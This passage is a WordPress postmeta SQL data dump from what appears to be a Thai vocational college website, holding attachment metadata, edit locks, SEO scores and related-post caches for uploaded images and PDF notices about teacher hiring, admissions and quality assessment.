(14586, 6200, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:248;s:4:\"file\";s:29:\"2019/10/10-1-2562-9-00-17.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-00-17-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14587, 6201, '_wp_attached_file', '2019/10/10-1-2562-9-01-10.png'),
(14588, 6201, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:606;s:6:\"height\";i:157;s:4:\"file\";s:29:\"2019/10/10-1-2562-9-01-10.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-01-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"10-1-2562-9-01-10-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-01-10-400x104.png\";s:5:\"width\";i:400;s:6:\"height\";i:104;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14589, 6203, '_wp_attached_file', '2019/10/10-1-2562-9-01-10-1.png'),
(14590, 6203, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:606;s:6:\"height\";i:157;s:4:\"file\";s:31:\"2019/10/10-1-2562-9-01-10-1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"10-1-2562-9-01-10-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-1-2562-9-01-10-1-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"10-1-2562-9-01-10-1-400x104.png\";s:5:\"width\";i:400;s:6:\"height\";i:104;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14591, 6204, '_wp_attached_file', '2019/10/10-1-2562-9-01-10-2.png'),
(14592, 6204, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:606;s:6:\"height\";i:157;s:4:\"file\";s:31:\"2019/10/10-1-2562-9-01-10-2.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"10-1-2562-9-01-10-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-1-2562-9-01-10-2-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"10-1-2562-9-01-10-2-400x104.png\";s:5:\"width\";i:400;s:6:\"height\";i:104;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14593, 1762, '_yoast_wpseo_content_score', '30'),
(14594, 6206, '_wp_attached_file', '2019/10/153199.jpg'),
(14595, 6206, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:432;s:4:\"file\";s:18:\"2019/10/153199.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"153199-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"153199-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"153199-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"153199-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"153199-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14597, 6213, '_edit_lock', '1571281294:14'),
(14598, 6213, '_edit_last', '14'),
(14599, 6214, '_wp_attached_file', '2019/10/171062-ประกาศรับสมัครครูจ้างช่างกลโรงงาน.pdf'),
(14603, 6213, '_hide_featured', NULL),
(14604, 6213, '_yoast_wpseo_content_score', '60'),
(14605, 6213, '_yoast_wpseo_primary_category', '3'),
(14606, 6213, '_wpas_done_all', '1'),
(14609, 6213, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575450337;s:7:\"payload\";a:0:{}}}'),
(14610, 6216, '_wp_attached_file', '2019/10/Untitled-6.png'),
(14611, 6216, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2019/10/Untitled-6.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-6-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-6-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-6-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-6-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14612, 6217, '_wp_attached_file', '2019/10/Untitled-1.png'),
(14613, 6217, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:450;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2019/10/Untitled-1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-225x300.png\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-225x300.png\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14623, 6223, '_wp_attached_file', '2019/10/การศึกษาการดำเนินงานการประกันคุณภาพการศึกษา-ของ-วท.ระยอง.pdf'),
(14631, 6225, '_tablepress_table_options', '{\"last_editor\":14,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(14632, 6225, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1,1,1]}'),
(14636, 6234, '_edit_lock', '1644563840:14'),
(14637, 6234, '_edit_last', '14'),
(14638, 6234, '_hide_featured', NULL),
(14639, 6234, '_yoast_wpseo_content_score', '90'),
(14640, 6237, '_wp_attached_file', '2019/10/อ.ปาริชาต-ธนาภรณ์.jpg'),
(14641, 6237, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:196;s:6:\"height\";i:243;s:4:\"file\";s:59:\"2019/10/อ.ปาริชาต-ธนาภรณ์.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"อ.ปาริชาต-ธนาภรณ์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14643, 6241, '_edit_lock', '1571712781:14'),
(14644, 6241, '_edit_last', '14'),
(14645, 6242, '_wp_attached_file', '2019/10/แจ้งกรอบแนวทางการประเมินคุณภาพภายนอกรอบ.jpg'),
(14646, 6242, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:129:\"2019/10/แจ้งกรอบแนวทางการประเมินคุณภาพภายนอกรอบ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:129:\"แจ้งกรอบแนวทางการประเมินคุณภาพภายนอกรอบ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:129:\"แจ้งกรอบแนวทางการประเมินคุณภาพภายนอกรอบ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:130:\"แจ้งกรอบแนวทางการประเมินคุณภาพภายนอกรอบ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:130:\"แจ้งกรอบแนวทางการประเมินคุณภาพภายนอกรอบ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:129:\"แจ้งกรอบแนวทางการประเมินคุณภาพภายนอกรอบ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14647, 6243, '_wp_attached_file', '2019/10/สำเนาของ-Brochure-สรุปการประเมินภายนอกแนวใหม่ร.pdf'),
(14648, 6244, '_wp_attached_file', '2019/10/สำเนาของ-PPT1-การประเมินคุณภาพภายนอกแนวใหม่.pdf'),
(14649, 6245, '_wp_attached_file', '2019/10/สำเนาของ-PPT2-ระบบAutomatedQA.pdf'),
(14650, 6246, '_wp_attached_file', '2019/10/1-ppt-ความเชื่อมโยงการประกันคุณภาพภายในกับก.pdf'),
(14651, 6247, '_wp_attached_file', '2019/10/2-ppt-กรอบแนวทางการประเมินคุณภาพภายนอก-ด้านก.pdf'),
(14652, 6248, '_wp_attached_file', '2019/10/กรอบแนวทางการประเมินคุณภาพภายนอก-อาชีวะ-ม.pdf'),
(14653, 6241, '_hide_featured', NULL),
(14654, 6241, '_yoast_wpseo_content_score', '60'),
(14657, 6257, '_wp_attached_file', '2019/10/ประกาศรายชื่อผู้มีสิทธิ์สอบ-ครูอัตราจ้าง-.pdf'),
(14668, 6259, '_edit_lock', '1572572932:14'),
(14669, 6259, '_edit_last', '14'),
(14670, 6260, '_wp_attached_file', '2019/11/เอกสาร-65.pdf'),
(14674, 6259, '_hide_featured', NULL),
(14675, 6259, '_yoast_wpseo_content_score', '60'),
(14676, 6259, '_yoast_wpseo_primary_category', '3'),
(14677, 6259, '_wpas_done_all', '1'),
(14680, 6259, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575650187;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6008;}i:1;a:1:{s:2:\"id\";i:5906;}i:2;a:1:{s:2:\"id\";i:6189;}}}}'),
(14681, 6262, '_wp_attached_file', '2019/11/เอกสาร-65-1.pdf'),
(14682, 6265, '_edit_lock', '1572605540:1'),
(14683, 6265, '_edit_last', '1'),
(14684, 6266, '_wp_attached_file', '2019/11/001.jpg'),
(14685, 6266, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1567;s:6:\"height\";i:2095;s:4:\"file\";s:15:\"2019/11/001.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"001-224x300.jpg\";s:5:\"width\";i:224;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"001-768x1027.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1027;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"001-766x1024.jpg\";s:5:\"width\";i:766;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"001-224x300.jpg\";s:5:\"width\";i:224;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14689, 6265, '_hide_featured', NULL),
(14690, 6265, '_yoast_wpseo_content_score', '30'),
(14691, 6265, '_yoast_wpseo_primary_category', '39'),
(14692, 6265, '_wpas_done_all', '1'),
(14693, 6265, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575626173;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:6040;}i:1;a:1:{s:2:\"id\";i:5936;}}}}'),
(14694, 6268, '_edit_lock', '1572925979:14'),
(14695, 6268, '_edit_last', '14'),
(14696, 6269, '_wp_attached_file', '2019/11/ประกาศโควตา63.pdf'),
(14700, 6268, '_hide_featured', NULL),
(14701, 6268, '_yoast_wpseo_content_score', '60'),
(14702, 6268, '_yoast_wpseo_primary_category', '3'),
(14703, 6268, '_wpas_done_all', '1'),
(14706, 6268, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575992795;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4701;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(14707, 6271, '_edit_lock', '1572939015:14'),
(14708, 6271, '_edit_last', '14'),
(14709, 6272, '_wp_attached_file', '2019/11/ประกาศรับสมัครครู-ชก.-กร..pdf'),
(14713, 6271, '_hide_featured', NULL),
(14714, 6271, '_yoast_wpseo_content_score', '60'),
(14715, 6271, '_yoast_wpseo_primary_category', '3'),
(14716, 6271, '_wpas_done_all', '1'),
(14717, 6271, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575742744;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5648;}i:1;a:1:{s:2:\"id\";i:4708;}i:2;a:1:{s:2:\"id\";i:4638;}}}}'),
(14718, 6275, '_edit_lock', '1573618773:14'),
(14719, 6275, '_edit_last', '14'),
(14720, 6276, '_wp_attached_file', '2019/11/ใบสมัครโควตาภายใน.pdf'),
(14724, 6275, '_hide_featured', NULL),
(14725, 6275, '_yoast_wpseo_content_score', '60'),
(14726, 6275, '_yoast_wpseo_primary_category', '3'),
(14727, 6275, '_wpas_done_all', '1'),
(14730, 6275, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575700677;s:7:\"payload\";a:0:{}}}'),
(14731, 6278, '_edit_lock', '1573718450:14'),
(14732, 6279, '_wp_attached_file', '2019/11/ประกาศวรับสมัครครูจ้างแผนกก่อสร้าง.pdf'),
(14733, 6278, '_edit_last', '14'),
(14737, 6278, '_hide_featured', NULL),
(14738, 6278, '_yoast_wpseo_content_score', '60'),
(14739, 6278, '_yoast_wpseo_primary_category', '3'),
(14740, 6278, '_wpas_done_all', '1'),
(14741, 6278, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575522928;s:7:\"payload\";a:0:{}}}'),
(14744, 6282, '_wp_attached_file', '2019/11/ประกาศพ้นสภาพไม่ลงทะเบียน2-62.pdf'),
(14755, 6285, '_edit_lock', '1574301788:14'),
(14756, 6285, '_edit_last', '14'),
(14757, 6286, '_wp_attached_file', '2019/11/211162-19.png'),
(14758, 6286, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-19.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-19-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-19-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-19-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-19-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-19-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14759, 6287, '_wp_attached_file', '2019/11/211162-18.png'),
(14760, 6287, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-18.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-18-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-18-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-18-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-18-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-18-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14761, 6288, '_wp_attached_file', '2019/11/211162-14.png'),
(14762, 6288, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-14.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-14-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-14-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-14-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-14-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-14-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14763, 6289, '_wp_attached_file', '2019/11/211162-13.png'),
(14764, 6289, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-13.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-13-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-13-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-13-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-13-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14765, 6290, '_wp_attached_file', '2019/11/211162-12.png'),
